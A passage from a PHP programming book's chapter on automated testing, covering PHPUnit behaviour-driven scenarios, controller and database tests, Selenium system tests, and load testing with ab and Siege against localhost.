// ⋮
/**
* @scenario
*/
public function sumOfTwoPositiveNumbersIsPositive()
{
$this
->given('New totaller')
->when('Totaller receives operand', 2)
->and('Totaller receives operand', 3)
->then('Total should be', 5);
}
/**
* @scenario
*/
public function sumOfAPositiveNumberAndZeroIsPositive()
{
$this
->given('New totaller')
->when('Totaller receives operand', 2)
->and('Totaller receives operand', 0)
->then('Total should be', 2);
}
/**
* @scenario
*/
public function sumOfEqualPositiveAndNegativeNumbersIsZero()
{
$this
->given('New totaller')
->when('Totaller receives operand', -1)
->and('Totaller receives operand', 1)
->then('Total should be', 0);
}
}
257
258
PHP Master: Write Cutting-edge Code
The above scenarios are equivalent to earlier example tests from the section called
“Test Doubles”. The naming convention of prefixing test methods with test do not
apply to scenarios; instead, a @scenario DocBlock tag is used to denote which
methods of the class are intended to function as scenarios.
Each call to the given(), when(), and then() methods passes the appropriate values
for $action and $arguments to its corresponding run*() method with the current
value for $world. The and() method merely acts as a semantic proxy to the last of
these methods executed within the chain.
Output scenario names are based on their corresponding method names. For output
to be formatted appropriately for BDD, execute a command of this form using the
--story flag:
phpunit --story My/TotallerTest.php
Output for this example would look as follows:
My_Totaller
[x] Sum of two positive numbers is positive
Given
When
and
Then
New totaller
Totaller receives operand 2
Totaller receives operand 3
Total should be 5
[x] Sum of a positive number and zero is positive
Given
When
and
Then
New totaller
Totaller receives operand 2
Totaller receives operand 0
Total should be 2
[x] Sum of equal positive and negative numbers is zero
Given
When
and
Then
New totaller
Totaller receives operand -1
Totaller receives operand 1
Total should be 0
Scenarios: 3, Failed: 0, Skipped: 0, Incomplete: 0.
Automated Testing
Testing for Views and Controllers
A common method of developing web applications involves using a Model-ViewController (MVC) framework to provide structure and commonly used components
upon which to build domain-specific logic. (You can refer back to the section called
“Model-View-Controller” in Chapter 4 in Chapter 4 for the full MVC lowdown.) If
you recall, models typically deal with data persisted in a database; thus, the approach
we’ll be looking at in the section called “Database Testing” is usually sufficient for
writing tests for them. Writing tests for controllers and views in such an application
may be less straightforward.
While implementations can vary significantly, the function of most MVC controller
implementations is to interact with models, collect data, and pass that data off to a
specific view for display to the end user. In other words, the controller and view
are somewhat coupled, or interdependent. Frameworks such as Zend Framework26
recommend either testing controllers and views together or not testing views at all.
Before going too deeply into the example in this section, it’s worth noting that you
should consult documentation and community communications such as mailing
lists and forums to confirm that your framework of choice has no native functionality
or extensions that provide the types of features used here. The examples shown in
this section are intended to illustrate concepts independent of any particular
framework.
Let's look at an example controller:
chapter_07/lib/Foo.php
class My_Controller_Foo extends My_Controller_Base
{
private $fooModel;
private $view;
public function setFooModel(My_Model_Foo $fooModel)
{
$this->fooModel = $fooModel;
}
public function getFooModel()
26
http://blueparabola.com/blog/getting-started-zendtest
259
260
PHP Master: Write Cutting-edge Code
{
if (empty($this->fooModel)) {
$this->fooModel = new My_Model_Foo();
}
return $this->fooModel;
}
public function setView(My_View $view)
{
$this->view = $view;
}
public function getView()
{
if (empty($this->view)) {
$this->view = new My_View();
}
return $this->view;
}
public function actionGet(array $params)
{
$fooModel = $this->getFooModel();
$fooId = $params['fooId'];
$fooData = $fooModel->get($fooId);
$view = $this->getView();
$view->assign($fooData);
return $view->render('path/to/template');
}
}
Note that this controller allows its dependencies to be injected; this allows mock
versions of these dependencies to be injected by tests. The action method
actionGet() uses these methods to obtain those dependencies, fetches a record
identified by a request parameter using the model, passes the data for that record
to the view, and returns the result of rendering a specific view template.
There are two types of tests that can be written for controllers: unit tests and functional tests. The former type (see the section called “Unit Testing”) involves
mocking dependencies to confirm that the controller has expected interactions with
those dependencies. The latter type takes more of a black box approach, focusing
on testing a controller’s response output given a set of predetermined input and
normal (that is, non-mocked) dependencies.
Automated Testing
Here’s an example of what a controller unit test might look like:
chapter_07/tests/FooTest.php
class My_Controller_FooTest extends PHPUnit_Framework_TestCase
{
private $controller;
public function setUp()
{
$this->controller = new My_Controller_Foo();
}
public function testActionGet()
{
$fooId = '1';
$fooData = array('bar' => 'baz');
$response = 'bar = baz';
$fooModel = $this->getMock('My_Model_Foo');
$fooModel->expects($this->once())
->method('get')
->with($fooId)
->will($this->returnValue($fooData));
$this->controller->setFooModel($fooModel);
$view = $this->getMock('My_View');
$view->expects($this->once())
->method('assign')
->with($fooData);
$view->expects($this->once())
->method('render')
->with('path/to/template')
->will($this->returnValue($response));
$this->controller->setView($view);
$params = array('fooId' => $fooId);
$this->assertEquals($response, $this->controller->➥
action($params));
}
}
In this test case, setUp() is used to instantiate the controller being tested and
testActionGet() is a test method corresponding to the action method being tested.
In the test method, each dependency is mocked to perform assertions on which
261
262
PHP Master: Write Cutting-edge Code
methods are invoked and what parameter values they receive when invoked. Each
mock object is then injected into the controller using its corresponding set*()
method. Finally, the action method is called with a predetermined request parameter,
and the response it returns is checked for conformity to the expected response.
The main difference between this unit test and an equivalent functional test is that
the latter would perform no mocking; it would simply allow the controller to use
the same defaults for dependencies provided by its get*() methods. A functional
test could also test request routing—that is, a request for a given URL results in a
specific controller action method being executed—but otherwise, it would be exactly
the same in this case.
In both cases, this example has a significant problem: if a view template changes
even slightly, the expected response must change with it. This can makes tests very
brittle, depending on how often your view templates change.
An alternative to checking for precise equality to the rendered view content as a
whole is searching that content for one or more specific indicators that the overall
operation has the expected result. Let's assume that the view template referenced
in the earlier example displays a form to edit a record fetched from the model. The
aforementioned indicators of a successful operation might be form fields populated
with appropriate values.
As with Selenium,27 the presence of elements within the response is generally
checked using CSS or XPath locator expressions. Neither PHP nor PHPUnit provides
native capability to handle CSS expressions; this requires a supplemental library
like Zend_Dom_Query28 from Zend Framework or phpQuery.29 However, PHP does
support XPath expressions natively in its core DOM extension.
Let’s assume your base test case class contains code resembling the following:
chapter_07/tests/TestCase.php
class My_TestCase extends PHPUnit_Framework_TestCase
{
public function assertContainsXPath($html, $expr)
27
http://seleniumhq.org/
http://framework.zend.com/manual/en/zend.dom.query.html
29
http://code.google.com/p/phpquery/
28
Automated Testing
{
$doc = new DOMDocument;
$doc->loadHTML($html);
$xpath = new DOMXPath($doc);
return ($xpath->query($expr)->length > 0);
}
}
We’ll also assume that the expected view output looks like this:
<form method=”post” action=”/foo”>
<label for=”bar”>Bar</label>
<input type=”text” id=”bar” name=”bar” value=”baz” />
<input type=”submit” value=”Submit” />
</form>
Your test suite to test the output of the previous controller example for a text field
could be this:
// tests/My/Controller/FooTest.php
class My_Controller_FooTest extends My_TestCase
{
public function testActionGet()
{
// ⋮
$response = $this->controller->action($params);
$expr = '//input[@name=”bar” and @value=”baz”]';
$this->assertContainsXpath($response, $expr);
}
}
One other difference between unit and functional testing of controllers is that
functional tests may require database integration (see the section called “Database
Integration” for more information). This section presents it for use with Selenium,
but it can be applied to controller tests as well.
Database Testing
Once code gains dependencies that are unable to be mocked—such as noncore PHP
features, or access to a system external to the code such as a database server—tests
263
264
PHP Master: Write Cutting-edge Code
for that code cease to be unit tests. This is because the code is no longer being tested
in isolation.
A good example of this might involve code that interacts with a database server.
While it’s possible to verify that the code attempts to send queries to the database
server under specific circumstances, such tests make assumptions about the database
schema. If the schema changes, the tests are going to continue to pass, which makes
them far less useful for exposing differences between the actual schema and the
schema expected by the code that interacts with it. As such, looking at what queries
are executed is ineffective for this type of testing.
What’s needed is a system to put the database into a known state, execute code that
interacts with that database, and perform assertions on the database state to ensure
that the executed code had the desired effect. Despite being known more widely as
a unit-testing framework, PHPUnit offers an extension for exactly this purpose,
which this section will use for its examples. If you prefer a different solution, consider PHPMachinist.30
Database Test Cases
The PHPUnit Database extension31 is modeled after the DbUnit extension to JUnit,
the de facto unit testing framework for Java. It doesn’t handle creating databases,
tables, or user credentials; it operates on the assumption that they’re already set up.
Instead, it allows you to create database test cases, test cases that handle using a
given connection to initialize the database with a given data set representing a
known database state before each test is run. It also provides assertions for comparing
the contents of databases table against other data sets representing an expected state
after code is executed.
Let’s look at a bare-bones example:
chapter_07/tests/DaoTest.php (excerpt)
class My_DaoTest extends PHPUnit_Extensions_Database_TestCase
{
/**
* @return PHPUnit_Extensions_Database_DB_IDatabaseConnection
30
31
https://github.com/stephans/phpmachinist
http://www.phpunit.de/manual/current/en/database.html
Automated Testing
*/
public function getConnection()
{
$pdo = new PDO('mysql:...');
return $this->createDefaultDBConnection($pdo, 'database_name');
}
/**
* @return PHPUnit_Extensions_Database_DataSet_IDataSet
*/
public function getDataSet()
{
return $this->createFlatXMLDataSet(dirname(__FILE__) .➥
'/_files/seed.xml');
}
}
Database test cases extend the PHPUnit_Extensions_Database_TestCase class. This
class has two abstract methods that its subclasses must implement: getConnection()
and getDataSet(). Implementations of these are shown in the previous example.
It’s a good practice to create a base database test case specific to your project that
implements these methods, and to have all other database test cases extend upon
that to avoid duplicating this code.
Connections
In order to initialize the database to a known state, PHPUnit must first connect to
the database server. The getConnection() method allows you to specify exactly
how that connection should be created. The only relevant aspect of this method is
that it must return an object that implements the interface PHPUnit_Extensions_Database_DB_IDatabaseConnection.
The Database extension provides a standard implementation of this interface that
uses PDO (see Chapter 2):
PHPUnit_Extensions_Database_DB_DefaultDatabaseConnection. The
createDefaultDBConnection() method call simply returns an instance of this class
initialized with the parameter values that are passed to it, a PDO connection to the
database server, and the name of the database being used.
Note that the code being tested by the test case isn’t expected to use PDO; it’s merely
what the default connection class uses to initialize the database with a given data
265
266
PHP Master: Write Cutting-edge Code
set. In cases when PDO is unavailable, you can write a class that implements the
same interface and have the getConnection() implementation in your base database
test case return an instance of that class instead.
Data Sets
In addition to the connection, PHPUnit needs a data set with which to seed or initialize the database prior to executing a test method against it. Data sets are also
used when performing assertions against the database state after the code being
tested has been executed. They can be created from several different sources:
Flat XML32
This is a simple XML-based format, but can cause
issues with columns capable of containing null
values.
XML
This is a more complex XML-based format that
avoids the issues with null values that the Flat
XML format has.
MySQL XML
This is excluded from documentation as of
PHPUnit 3.5.13, but is natively supported as of
PHPUnit 3.5.0. It uses the XML format of the
mysqldump utility that comes with the MySQL
database server.
YAML
This combines the simplicity of the Flat XML
format with the avoidance of issues with null
values of the XML format, but requires a Symfony
YAML library.33
CSV
This is a simple and fairly portable format, but
each file is limited to containing data for a single
table.
Array34
This avoids issues with null values and allows
data to be specified inline in test cases, as well as
32
http://www.phpunit.de/manual/current/en/database.html#flat-xml-dataset
http://components.symfony-project.org/yaml/
34
http://www.phpunit.de/manual/current/en/database.html#array-dataset
33
Automated Testing
in external files. While it isn’t natively supported,
an example implementation is included in the
PHPUnit manual.
Query
This produces a data set from querying a database.
Database
This produces a data set from some or all of the
tables in a database.
The MySQL XML format is a commonly desired option, so let’s look at an example
using that. To generate a seed file, execute a command such as the following:
mysqldump --xml -t -u [username] -p [database] [tables] >➥
/path/to/seed.xml
Substitute appropriate values for [username], [database], and /path/to/seed.xml
here. [tables] is an optional space-delimited list of tables to which the dump will
be limited; when it’s unspecified, all tables in the database are included.
The getDataSet() implementation in your database test case to use this XML file
would look as follows, again with an appropriate value substituted for
/path/to/seed.xml:
public function getDataSet()
{
return $this->createMySQLXMLDataSet('/path/to/seed.xml');
}
PHPUnit_Extensions_Database_TestCase offers convenient create*DataSet
shorthand methods to obtain data set instances for some of the formats it supports,
like the MySQL XML format. Others require explicitly instantiating and configuring
an instance of their respective classes. Consult the Database Testing chapter of the
PHPUnit manual35 for specifics on your preferred format.
The easiest approach for seed data sets is to create one for the entire database with
the minimum amount of data needed to adequately test all code using that database,
and to use that seed data set for all database test cases. The overhead of inserting
data that’s not needed for any given test case is fairly negligible in most cases.
35
http://www.phpunit.de/manual/current/en/database.html#understanding-datasets-and-datatables
267
268
PHP Master: Write Cutting-edge Code
An alternative approach is to generate a separate data set for each database table,
and to manually combine them into a composite data set36 in your getDataSet()
implementation. Let’s say that you executed the above mysqldump command once
per table in your database, and specified that table’s name for the [tables] parameter, like so:
mysqldump --xml -t -u [username] -p [database] table1 >➥
/path/to/table1.xml
⋮
mysqldump --xml -t -u [username] -p [database] tableN >➥
/path/to/tableN.xml
Now let’s say, for a specific database test case, that you only needed the tables
table1 and table3 to be seeded. Your getDataSet() implementation for that test
case might look as follows:
chapter_07/tests/DaoTest.php (excerpt)
class My_DaoTest extends PHPUnit_Extensions_Database_TestCase
{
// ⋮
/**
* @return PHPUnit_Extensions_Database_DataSet_IDataSet
*/
public function getDataSet()
{
$table1 = $this->createMySQLXMLDataSet('/path/to/table1.xml');
$table3 = $this->createMySQLXMLDataSet('/path/to/table3.xml');
$composite = new PHPUnit_Extensions_Database_DataSet_➥
CompositeDataSet();
$composite->addDataSet($table1);
$composite->addDataSet($table3);
return $composite;
}
}
36
http://www.phpunit.de/manual/current/en/database.html#composite-dataset
Automated Testing
Creating a data set for an individual table is no different than creating one for an
entire database: simply call the createMySQLXMLDataSet() method and specify the
file containing the data for the desired table. Consolidate multiple data sets by instantiating the class PHPUnit_Extensions_Database_DataSet_CompositeDataSet
into a composite data set, and pass those data set instances individually to its
addDataSet() method. At that point, simply have getDataSet() return that composite data set instance, and it will be used to seed the database like any other data
set instance.
Assertions
Aside from the assertions used, database test cases look a lot like unit test cases;
setUp() and tearDown() are used the same way, for example. A test case implementation might look like this:
chapter_07/tests/DaoTest.php (excerpt)
class My_DaoTest extends PHPUnit_Extensions_Database_TestCase
{
private $dao;
// getConnection() and getDataSet() implementations from earlier➥
go here
protected function setUp()
{
$this->dao = new My_Dao;
// any other required setup – connecting to the database, etc.
}
public function testDoStuff()
{
$this->dao->doStuff();
// asserting table row count
$expected_row_count = 2;
$actual_row_count = $this->getConnection()->getRowCount➥
('table_name');
$this->assertEquals($expected_row_count, $actual_row_count);
// asserting table / query result set equality
$expected_table = $this->createMySQLXMLDataSet➥
('/path/to/expected_table.xml')
269
270
PHP Master: Write Cutting-edge Code
->getTable('table_name');
$actual_table = $this->getConnection()->createQueryTable➥
('table_name',
'SELECT * FROM table_name WHERE ...');
$this->assertTablesEqual($expected_table, $actual_table);
}
}
By the time testDoStuff() is executed, the database test case has already seeded
the database with the data set returned by getDataSet(). The test method then executes code being tested to perform operations against the database. Afterward, it
performs any assertions necessary to verify that the operations had the intended
effect, such as changing the number of rows or data contained in rows of one or
more tables.
Systems Testing
Once the individual components of a system and their interactions with external
systems have been tested, the application as a whole should be tested too. This is
referred to as systems testing. In the case of web applications, this is typically done
by writing automated tests that interact with a browser in the same way that a human
user would.
A popular software package for writing and executing such tests is Selenium,37 a
Java-based server that allows clients to connect to it and execute commands to
launch and interact with web browsers. The more common use for this software is
to execute a sequence of actions within a web application, and then make assertions
about the contents of the last loaded document to confirm it’s functioning as intended.
PHPUnit includes a Selenium extension that allows these interactions to be performed. Code examples in the remainder of this section will use this extension to
show what client-side Selenium logic looks like. You can refer to the installation
documentation for either Selenium Server38 or Selenium RC39 to install the server
component prior to writing client tests.
37
http://seleniumhq.org/
http://seleniumhq.org/docs/03_webdriver.html#setting-up-a-selenium-webdriver-project
39
http://seleniumhq.org/docs/05_selenium_rc.html#installation
38
Automated Testing
Initial Setup
Like the Database extension, the Selenium extension for PHPUnit provides its own
base test case and assertions. Let’s look at a simple example:
chapter_07/tests/BaseSeleniumTestCase.php (excerpt)
abstract class My_BaseSeleniumTestCase extends➥
PHPUnit_Extensions_SeleniumTestCase
{
protected function setUp()
{
$this->setHost('localhost');
$this->setPort(4444);
$this->setBrowser('*firefox');
$this->setBrowserUrl('http://example.com');
$this->setTimeout(5000);
}
}
setHost() and setPort() refer to the host and port on which the Selenium server
is running. The values passed to them in this example are the default values; explicitly calling these methods with these values is unnecessary. The method calls are
merely shown here for demonstration purposes.
setBrowser() specifies the web browser to launch. Oddly, the Selenium manual
omits a list of supported browser strings, but one can be found in the source code.40
It’s also possible to specify the path to a browser executable,41 which is useful on
systems running multiple versions of the same browser or a browser that Selenium
doesn’t officially support, and to specify multiple browsers42 with different values
for the parameters set in the preceding example.
setBrowserUrl() has a slightly misleading name. It actually sets a base URL that
is automatically prefixed to all relative URL values subsequently passed to the
open() method, which simulates a user entering a URL into the address bar. Using
the value passed to setBrowserUrl() in the above example, calling $this40
http://svn.openqa.org/fisheye/browse/selenium-rc/trunk/server-coreless/src/main/java/org/openqa/selenium/server/browserlaunchers/BrowserLauncherFactory.java?r=trunk
41
http://seleniumhq.org/docs/05_selenium_rc.html#specifying-the-path-to-a-specific-browser
42
http://www.phpunit.de/manual/current/en/selenium.html#selenium.seleniumtestcase.examples.WebTest3.php
271
272
PHP Master: Write Cutting-edge Code
>open('/index.php') would open the URL http://example.com/index.php. (Note
that open() also accepts absolute URLs.)
setTimeout() is used to set a timeout for the initial connection to the Selenium
server. It receives an integer representing in milliseconds the amount of time to
wait. The above example uses a timeout of 5,000 milliseconds, or five seconds.
It’s a good practice to establish your own base test case per project. This allows
custom assertions and other methods containing commonly used logic to be made
available to all other test cases in the project.
Commands
The implementation of commands is unfortunately not quite as straightforward as
the methods used in the initial setup. This is an important area to understand as
you begin writing tests. To explain it, let’s look at what happens when a command
is issued:
chapter_07/tests/FooSeleniumTestCase.php (excerpt)
class My_FooSeleniumTestCase extends My_BaseSeleniumTestCase
{
protected function setUp()
{
$this->open('/foo');
// ⋮
}
}
PHPUnit_Extensions_SeleniumTestCase neither declares nor inherits an imple-
mentation for open(). However, it does have a __call() implementation, so PHP
implicitly executes that and passes it the name of the method and the parameters
passed in the original method call.
__call() proxies to an instance of PHPUnit_Extensions_SeleniumTestCase_Driver.
Like the test case, the driver doesn’t declare or inherit an implementation for open(),
and does implement __call(), so the method call is resolved to that.
Automated Testing
At this point, the method call is interpreted and any corresponding commands are
sent to the Selenium server. In appropriate situations, a server response is processed
and a return value is sent back to the code that made the original method call.
The DocBlocks of both __call() implementations include a list of supported
commands. Additionally, the Selenium website contains a reference for the RC
protocol43 that further explains what commands and assertions do, what parameters
they accept, and what values they return.
Locators
In order to interact with document elements or assert their presence or absence,
you need a way to specify which elements you’re interested in. This is accomplished
with locators, a general term used in Selenium documentation to refer to any expression used to identify an element. When the documentation for a command references a locator parameter, this is what they’re referring to. Locator expressions
are formatted like so:
locatorType=argument
While limiting the expression to only the argument value is allowed, it’s usually
best to include the locator type rather than leave Selenium to guess. Though Selenium supports other locator types, the types most commonly used in order from bestto worst-performing are identifier, CSS selector, and XPath expression.
The locator type for identifier expressions is identifier. Selenium evaluates this
type of expression by first searching the current document for an element where
the id attribute value matches the supplied argument. If that fails to match any
elements, Selenium then repeats the search with the name attribute instead of the
id attribute. id and name can also be used as locator types to limit searches to their
respective attributes only.
CSS selectors use the locator type css. If you’ve ever worked with stylesheets for a
markup document or worked with a JavaScript library like jQuery, you’re probably
already familiar with CSS selectors. Selenium supports both CSS244 and CSS3 se-
43
44
http://release.seleniumhq.org/selenium-core/1.0.1/reference.html
http://www.w3.org/TR/REC-CSS2/selector.html
273
274
PHP Master: Write Cutting-edge Code
lectors.45 While the W3C specs are the most comprehensive references, they are
also fairly dry and academic in tone. The jQuery documentation46 provides excellent
explanations of selectors with accompanying visual examples.
The xpath locator type is associated with XPath expressions, which correspond to
a standard47 used for searching XML-compatible documents, similarly to how regular expressions are used to search for patterns in strings. XPath is one of the slower
locator types48 and, as such, should be avoided where possible. Most XPath expressions can be rewritten as CSS selectors. If your circumstances demand that you use
XPath and your familiarity with it is limited, there’s an excellent tutorial by Tobias
Schlitt and Jakob Westhoff on the subject.49
It’s not uncommon for the same locator expression to be used multiple times in the
test suite for an application. As such, it’s good practice to establish semantically
meaningful names for expressions, store them in a central location such as a PHP
file that returns an associative array, and reference them by name wherever they
are needed. This prevents duplication of expressions in source code and increases
maintainability. The same principle applies to relative URLs and similar parameters
of Selenium commands.
Assertions
PHPUnit_Extensions_SeleniumTestCase does provide some assertions,
50
but not
all available assertions are explicitly declared there. Recall that this class proxies
commands to a driver instance, which in turn handles them in its __call() implementation. If you view the source code for this, you’ll find a line resembling the
following:
case isset(self::$autoGeneratedCommands[$command]): {
The driver class constructor executes a method called autoGenerateCommands().
For each supported get*() or is*() method listed in the DocBlock of the test case
45
http://www.w3.org/TR/2001/CR-css3-selectors-20011113/
http://api.jquery.com/category/selectors/
47
http://www.w3.org/TR/xpath/
48
http://saucelabs.com/blog/index.php/2011/01/selenium-xpath-marks-the-spot/
49
http://schlitt.info/opensource/blog/0704_xpath.html
50
http://www.phpunit.de/manual/current/en/selenium.html#selenium.seleniumtestcase.tables.assertions
46
Automated Testing
and driver __call() implementations, autoGenerateCommands() creates entries in
the $autoGeneratedCommands property for corresponding assert*() and
assertNot*() methods.
As an example, one supported command method is getTitle(). The corresponding
assertion methods for this method are assertTitle() and assertNotTitle(). Both
accept an expected value for the title, execute the getTitle() method internally
for the actual value, and perform a standard equal or unequal assertion to compare
the two; they simply provide a convenient shorthand. For comparison logic other
than simple equality, consider using the glob, regexp, or regexpi pattern syntaxes.51
One notable trait of assertions is that they’re applied to the document’s present
state. That is, even if the assertion would pass when performed on the document’s
state a fraction of a second from now, it will fail if it doesn’t pass now. Methods
like waitForPageToLoad() will terminate when the markup for a page is returned
or the supplied timeout is reached. If an assertion is performed to check for dynamic
content resulting from client-side code making an additional request, the assertion
may fail if the server takes too long to fulfill that request.
To fill this need, waitFor*() and waitForNot*() methods are also supported. These
execute their corresponding assert*() methods once per second until either the
assertion passes or the timeout specified by the driver’s $httpTimeout property is
reached (which can be set using its setHttpTimeout() method). The main disadvantage to using these is that the second delay isn’t configurable and can add up
quickly if you have a lot of tests. In such cases, it may make sense to write your
own version.
Database Integration
System tests for database-driven applications often require the ability to put the
database in a specific state before a test begins, as database tests do. However, because
system tests have their own base class in PHPUnit, implementing database seeding
can’t be done by extending the database test case.
Instead, related logic must be moved into a separate class that can be invoked from
both types of test cases. Luckily, the Database extension provides a basis for such
a class. Let’s look at an example of using this class:
51
http://release.seleniumhq.org/selenium-core/1.0.1/reference.html#patterns
275
276
PHP Master: Write Cutting-edge Code
chapter_07/tests/DatabaseTester.php
class My_DatabaseTester extends➥
PHPUnit_Extensions_Database_AbstractTester
{
/**
* @return PHPUnit_Extensions_Database_DB_IDatabaseConnection
*/
public function getConnection()
{
$pdo = new PDO('mysql:...');
return $this->createDefaultDBConnection($pdo, 'database_name');
}
/**
* @return PHPUnit_Extensions_Database_DataSet_IDataSet
*/
public function getDataSet()
{
return $this->createFlatXMLDataSet(dirname(__FILE__) .➥
'/_files/seed.xml');
}
}
If the methods in this class look familiar, they should: they’re identical to methods
from the base database test case example shown earlier. What this base class provides
is code that uses these methods to perform the same operations on the database that
the base database test case does in its setUp() and tearDown() implementations.
In order to do so, however, it requires that corresponding methods be called at appropriate points in your system test case, as in this example:
chapter_07/tests/FooSeleniumTestCase.php (excerpt)
class My_FooSeleniumTestCase extends My_BaseSeleniumTestCase
{
protected $databaseTester;
protected function setUp()
{
parent::setUp();
$this->databaseTester = new My_DatabaseTester();
$this->databaseTester->onSetUp();
}
Automated Testing
protected function tearDown()
{
parent::tearDown();
$this->databaseTester->onTearDown();
}
}
The onSetUp() call handles clearing the database of data and reseeding it. The
onTearDown() call does nothing by default. These can be configured using the
setSetUpOperation() and setTearDownOperation() methods implemented in
PHPUnit_Extensions_Database_AbstractTester, either from the system test case
or the database tester constructor. For appropriate values to pass to these methods,
examine the return values of methods in the
PHPUnit_Extensions_Database_Operation_Factory class.
Debugging
Because a Selenium test terminates as soon as an assertion fails and takes the entire
browser session with it, debugging output is extremely helpful in locating the cause.
The Selenium extension offers a few different sources of such information.
One source is screenshots. Depending on the nature of the issue, a screenshot may
expose the cause immediately without requiring you to tediously comb through
markup. To enable automatic creation of screenshots when a test fails, set all the
following properties in your test case:
chapter_07/tests/FooSeleniumTestCase.php (excerpt)
class My_FooSeleniumTestCase extends My_BaseSeleniumTestCase
{
protected $captureScreenshotOnFailure = TRUE;
protected $screenshotPath = '/var/www/htdocs/screenshots';
protected $screenshotUrl = 'http://localhost/screenshots';
// ⋮
}
Screenshots can be toggled on or off using the $captureScreenshotOnFailure flag.
Note that this only causes them to be taken when an assertion fails. $screenshotPath
specifies a directory where screenshot files are to be stored in PNG format using
names corresponding to test methods in which the assertion failures occurred. Fi-
277
278
PHP Master: Write Cutting-edge Code
nally, $screenshotUrl can be used to specify an accessible base directory or URL
at which the screenshot files will be accessible.
Note that it is possible to manually create a screenshot even when a failure hasn’t
occurred. Take a look at the onNotSuccessfulTest() method of the
PHPUnit_Extensions_SeleniumTestCase class to see how it’s done automatically.
Sometimes, a screenshot will fail to reveal the problem and more information will
be required. At this point, the HTML source of the page being viewed may be
helpful. If you want to have your test cases always dump the source to a file when
a test fails, you could do this:
chapter_07/tests/BaseSeleniumTestCase.php (excerpt)
class My_BaseSeleniumTestCase extends➥
PHPUnit_Extensions_SeleniumTestCase
{
protected $htmlSourcePath = '/var/www/htdocs/source';
// ⋮
protected function onNotSuccessfulTest(Exception $e)
{
parent::onNotSuccessfulTest($e);
$path = $this->htmlSourcePath . DIRECTORY_SEPARATOR .
$this->testId . '.html';
file_put_contents($path, $this->getHtmlSource());
echo 'Source: ', $path, PHP_EOL;
}
}
It’s possible to generate coverage reports for code being executed by Selenium tests
just as with unit tests. To do this, copy somewhere within your web server document
root directory PHPUnit/Extensions/SeleniumTestCase/phpunit_coverage.php. In your
php.ini file, set auto_prepend_file and auto_append_file to absolute paths for
PHPUnit/Extensions/SeleniumTestCase/prepend.php and
PHPUnit/Extensions/SeleniumTestCase/append.php, respectively. In your test case, add
this property and adjust its value according to your web server’s host name and the
path to which you’ve copied phpunit_coverage.php:
protected $coverageScriptUrl = 'http://localhost/➥
phpunit_coverage.php';
Automated Testing
Automating Writing Tests
The goal of system tests is to perform tasks within an actual application as an actual
user might, in order to confirm that the application conforms to expected behavior.
You might conclude that the act of writing tests itself could be expedited by a human
performing these tasks manually one time and the computer converting those actions
into actual PHP test code. And you would be correct.
When using Selenium for system testing, the method of writing tests that’s generally
most efficient involves using Selenium IDE, a plugin for the Mozilla Firefox web
browser; it provides an entire integration development environment for recording,
changing, running, debugging, and generating code for Selenium tests. In addition,
it’s a feasible way for even nondevelopers with some level of technical skill to create
test cases that can be used to generate initial code, which developers can later
supplement manually.
The Selenium IDE documentation52 is a fairly comprehensive resource on how to
install and use it. Once tests are composed and code for them is generated, the information in this section can be used to add logic not supported by Selenium IDE,
such as that for database integration. In short, Selenium IDE can negate a significant
portion of the initial overhead involved in writing system tests by automating the
creation of code, and thus ease the learning curve of writing test code manually.
Load Testing
Once an application is working correctly, both in terms of its individual components
and as a whole, it’s helpful to know how that application performs as a whole. Load
testing involves simulating activity for a group of users to determine how well the
application performs under the load.
This information can be useful in two major ways. First, if you have specific expectations for the load an application will need to handle when it’s deployed to production, load testing can provide a rough estimate of how much server hardware will
be required. Second, while an application is being developed or maintained, load
testing can expose changes that may significantly impact performance, especially
52
http://seleniumhq.org/docs/02_selenium_ide.html
279
280
PHP Master: Write Cutting-edge Code
if automated load tests are included in a continuous integration environment—that
is, a repeated series of quality control processes.
The remainder of this section will review available tools for performing load tests,
including how to interpret their output, and provide some associated resources.
For further information on these topics, refer to the excellent benchmark blog post
series written by Paul Jones.53
ab
54
is a relatively simple benchmarking tool developed as part of the Apache HTTP
server project, and is available in most environments with Apache installed. While
it has a number of parameters with which to tweak how it conducts its tests, three
in particular are used frequently:
ab
1. -c #: number of concurrent requests to make per second, or the number of users
accessing the application simultaneously
2. -n #: number of requests to send
3. -t #: maximum amount of time in seconds to continue testing, assumes -n 50000
So, for example, if you wanted to simulate site activity with 10 concurrent users
for one minute, the command to use would be:
ab -c 10 -t 60 http://localhost/phpinfo.php
ab has a fair bit of output, but this block is most frequently of interest:
Concurrency Level:
Time taken for tests:
Complete requests:
Failed requests:
Write errors:
Total transferred:
HTML transferred:
Requests per second:
Time per request:
53
54
10
60.003 seconds
20238
0
0
1502270841 bytes
1498403855 bytes
337.29 [#/sec] (mean)
29.648 [ms] (mean)
http://paul-m-jones.com/category/programming/benchmarks
http://httpd.apache.org/docs/2.2/programs/ab.html
Automated Testing
Time per request:
requests)
Transfer rate:
2.965 [ms] (mean, across all concurrent➥
24449.97 [Kbytes/sec] received
The two bold lines in particular are important. Requests per second, sometimes
abbreviated to rps, is the main metric for load testing. Its increase implies that application performance has been improved, and vice versa. If your application is
working as expected, Failed requests exceeding zero generally implies that the
application is unable to handle the load used for the test on the hardware hosting
it. If an application request fails to be fulfilled within a certain amount of time, the
client will terminate the request from their end and it will be counted as failed.
Thus, the highest value of Requests per second for which Failed requests do not
exceed zero is the application’s maximum load on that hardware.
Siege
Another commonly used load testing tool is Siege,55 which is developed by Joe Dog
Software. Where ab is limited to testing load on one specific URL, Siege is useful
for testing load on an entire application, in addition to that URL. The Siege manual56
describes the options it supports, but here are a few of the more useful ones:
■ -u [url]: a single URL to load test
■ -f [file]: path to a file containing one or more URLs (one per line) to load test
■ -i: internet mode, which simulates users hitting random URLs from the file
specified with -f
■ -c #: number of concurrent users
■ -r #: number of requests to be sent per user
■ -t #[SMH]: maximum amount of time to continue testing in seconds, minutes,
or hours as denoted by including S, M, or H, respectively, after the quantity
■ -d #: time in seconds between requests per user, defaulting to 3; it’s recommended to use 1 for benchmarking
55
56
http://www.joedog.org/index/siege-home
http://www.joedog.org/index/siege-manual
281
282
PHP Master: Write Cutting-edge Code
■ -l [file]: logs the output from siege to a file, appending to it if it already exists
■ -v: verbose mode, which includes the HTTP protocol version, response code,
and URL for each request
One handy aspect of Siege is that the default values of its options can be changed
with a configuration file. This defaults to .siegerc in your user directory, which can
be generated using the siege.config utility if it doesn’t exist. The stock .siegerc file
includes extensive comments explaining each option. A file with a different path
can be specified using the -C option.
The equivalent Siege command for the earlier ab example using 10 concurrent users
and running for one minute is this:
siege -c 10 -t 60S -d 1 http://localhost/phpinfo.php
The corresponding output resembles the following:
** SIEGE 2.69
** Preparing 10 concurrent users for battle.
The server is now under siege...
Lifting the server siege...
done.
